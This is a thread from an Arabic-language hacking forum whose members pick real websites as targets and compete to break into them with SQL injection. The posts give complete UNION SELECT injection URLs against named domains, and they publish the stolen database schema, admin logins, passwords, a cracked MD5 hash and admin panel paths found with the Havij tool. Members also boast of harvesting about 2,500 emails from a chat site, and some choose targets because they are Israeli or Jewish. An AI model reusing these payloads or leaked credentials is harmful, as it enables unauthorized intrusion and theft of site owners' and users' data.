![]() |
اقتباس:
ننتظر البقية وان شاء الله الهدف الي بعدو راح احاول القيلك موقع سريع بالتصفح تحياتي[/align] |
موقع لسكربت اسرائيلى مصاب بثغرة السيكول ومعظم المواقع المركب عليها السكربت مواقع اسرائيلية http://flexible.co.il/services_cat.asp?ccategory=11%27 ننتظر ممن لهم الخبرة فى مايكروسوفت اكسس |
اقتباس:
وعند استدعاء اى اعمدة فالموقع لا يستجيب كود PHP: |
اقتباس:
بس الموقع لمن جربت افتح احد العواميد فتحت عادي وهذا المثال : كود PHP: تحياتي [/align] |
نعم لكن عند استخدام الامر concat على اى اعمدة لا يستجيب الموقع لامر عرض ما بداخل الاعمدة وهذا ما اقصد مثلا كود PHP: |
اقتباس:
اقتباس:
انت متاكد من هذا العمود ؟ [/align] |
انا اظن ان ذلك السكرتب فقط لتجربة في ذلك الموقع لا غير او ان الحماية كتييرة عليه |
[align=center]تم تغير الهدف... هذا الهدف الجديد : http://www.araob.com/news.php?id=1204 ملاحضة : الي يحقن الموقع لا يغير الاندكس ولا الباس ولا يغير اي شي بالموقع لانه موقع عربي.. نحن راح نحقن القاعدة وبعدها راح نراسل الادارة بخصوص الثغرة والترقيع تحياتي [/align] |
[align=center]موقع قناة غنوة مصاب : http://www.ginwah.com/default.asp?peagSh=CatPage&ID=5 تحياتي [/align] |
اقتباس:
يا غالي أنت المشرف على هذا الموضوع لازم تضع مواقع ( هدف ) أنت حقنته من قبل لا تقم بوضع موقع مستحيل حقنه ( لو كان صعب عادي ) لأنو هكذا المبتدئين راح يكرهوا الحقن بسرعة و يملوا منه يا غالي إن شاء الله تتقبل رأيي و هذا هدف هدية لك :) : كود: http://www.talkeetnachamber.org/news.php?id=158 و أي مساعدة أنا هنا بالتوفيق |
Syst3m-32 جاري يا بطل |
كود: http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,database%28%29,8,9,10,11-- الفلترة مانفهت معي مع from الأمر from+information_schema.columns فما الحل راكو شوقتونا |
وصلت الحقنة إلى كود: http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,8,9,10,11+from+information_schema.columns-- |
الحقنة في كود: http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,8,9,10,11+from+information_schema.columns+where+table_name=0x7068704d795365617263685f73657474696e6773-- كود: phpMySearch_settings:DBPassword:talkeetn_db01 كود: phpMySearch_settings:recNo:talkeetn_db01 وجاري المتابعة بإذن الله |
أوكي بإنتظارك و أي مشكلة أنا هنا :) و لا تتسرع مرة أخرى لأنه لا توجدأي فلترة بالتوفيق |
نهاية الحقنة كود: http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28adminLogin,0x3a,adminPassword%29,8,9,10,11+from+phpMySearch_settings-- password = admin |
جاري تخمين مسار لوحة التحكم أخي Syst3m-32 |
للأسف هذا ماخمنه برنامج havij وما نصح معايا كود: Page Found: http://www.talkeetnachamber.org/admin1.html |
اقتباس:
+ كلامك على عيني وعلى راسي بس انا فعلا حقنت الموقع قبل ما وضعتو على قائمة الاهداف الجديدة وهاي معلومات الادمن UserName : alseadi Password : wfahad12 شكرا على المشاركة معانا وننتظر حقن الهدف الجديد.. تحياتي [/align] |
اقتباس:
شغل حلو ^_^ معليش الموقع الثاني بنلقي لوحة التحكم باذن الله تحياتي |
[align=center]هههه جابها احد الاعضاء الاستغلال من الاخ karim_topten كود PHP: تحياتي |
أين المواقع الأخرى أخي Master vbspiders |
اقتباس:
من عيوني خويا الغالي جاري البحث ثواني بس... تحياتي |
أحسنت عملا أخي ooooo_darkman_ooooo حقنة كاملة و عمل رائع بالتوفيق و بالنسبة للوحة نفس النتائج يعني ممكن صاحب الموقع مغيره المهم...! في إنتظار المواقع و لو مش موجود أنا هنا فقط عشان أترك الأعضاء يستفدوا بالتوفيق |
[align=center]اسف على التاخير هذا الهدف الجديد : http://www.cnet.org.uk/news1.php?ID=60 الهدف سهل هالمرة... بالتوفيق تحياتي [/align] |
تم الحقن و أنا آسف على التأخير أنا عم إستخرجت حوالي 2500 إيميل من موقع و أنا الآن أفك التشفير لوول المهم ...! هذه هي الحقنة : كود: http://www.cnet.org.uk/news1.php?ID=-60%20UNION%20SELECT%201,concat%28id,0x3a,username,0x3a,password%29,3,4+from+pm_members-- الأدمن : Admin باسوارده : d20c2b4dab47f7ae84f580e21dd32cbf و تم فك التشفير : cnet2529 بالتوفيق |
اقتباس:
مشكور أخي system-32 لدي مواقع كثيرة راح أضعها بإذن الله في الأيام القليلة القادمة |
أنا أيضا طلعت اللإيميلات و كل شيئ ههههههههههههههههههههههههههههه |
الحقنة كاملة كود: http://www.cnet.org.uk/news1.php?ID=-60 union select 1,version(),group_concat(username,0x3a,password,0x3a,email),4+from+pm_members-- أنا طبقت على الثاني وجاري العمل على الأول للإستطلاع كود: cn_members:MemberPassword:cnet_org_uk_-_db كود: pm_members:id:cnet_org_uk_-_db على ما أعتقد md5 كود: admin:d20c2b4dab47f7ae84f580e21dd32cbf:admin@cnet.org.uk |
الهاشات مفكوكة كود: admin: cnet2529 :admin@cnet.org.uk |
برااااااافو لكن أنا حقنته قبلك smilies17 لوول بالمناسبة أنا لما قلت لك أني أفك الهاشات لأكثر من 2500 إيميل لم أقصد هذا الموقع أنا إخترقت موقع للشات و منه إستخرجت بالتوفيق |
جربت هاته المسارات اللي أنا تحصلت عليها من برنامج havij وما تفعت هانك ‘حتمالين الأول قامو بتغيير مسار لوحة التحكم و الثاني أني قمت بإختيار عمود الباس الخاطئ و الله أعلم أعتقد أنو الإحتمال الأول صحيح وهاته هي المسارات اللي أنا خمنتها كود: Page Found: http://www.cnet.org.uk/admin.php |
اقتباس:
smilies6 أنا كنت أتعشي و أنت كنت تعمل على الموقع ههههههههههههههههههههههههههههههههههه smilies15 بصختك يا ولد البلاد أنت الكل في الكل smilies9 smilies12 |
[align=center]ابطال والله... لوحة الدخول : http://www.cnet.org.uk/login.php ههههه هو بيقول المعلومات خطا عموما نحن عملنا الي علينا والباقي على الله ههههه مشكورين على المشاركة القادم اصعب تحياتي [/align] |
هل من أهداف جديدة ؟؟؟؟؟؟؟؟؟ إذا ماكانش أنا راح نحطلكم ؟؟؟ |
وينهم الأعضاء إحنا الـ3 فقط ؟؟؟ كمان وين تكريم صاحب الموضوع من الإدارة ؟؟؟ بالتوفيق |
اقتباس:
اوك بالنسبة لوضع الاهداف الجديدة راح بيكون هيك... الان انت ضع الهدف الجديد وبعدها الي راح يحقنو هو الي يحط الهدف الجديد وهيك>> تحياتي |
اقتباس:
[align=center]الاعضاء ممكن ما يعرفون بالموضوع او هيك شي مع انو الموضوع في اعلى الصفحة تبع القسم ومثبت... اما بالنسبة للتكريم اعتقد التثبيت ومروركم العطر على موضوعي يكفي تحياتي[/align] |
Syst3m-32 هوما يحبو المخقون المنتهي ههههههههههههههههههههه يحبون قسم الإنجازات خخخخخخخخخخخخخخخخخخخخ مسااااااااااااااااااااااكين أنا راح أحط الهدف موقع يهودي إصدار قاعدته 4 |
اقتباس:
فسوف تجد موضوعك في الأرشيف في المستقبل القريب و آخر رد هو ردي ............لأنو ماراح يرد ولا واحد فقط نحن 3 smilies6:grr::a39:smilies8:a40:smilies16smilies13: a23::a09: |
الساعة الآن 12:04 PM |
[ vBspiders.Com Network ]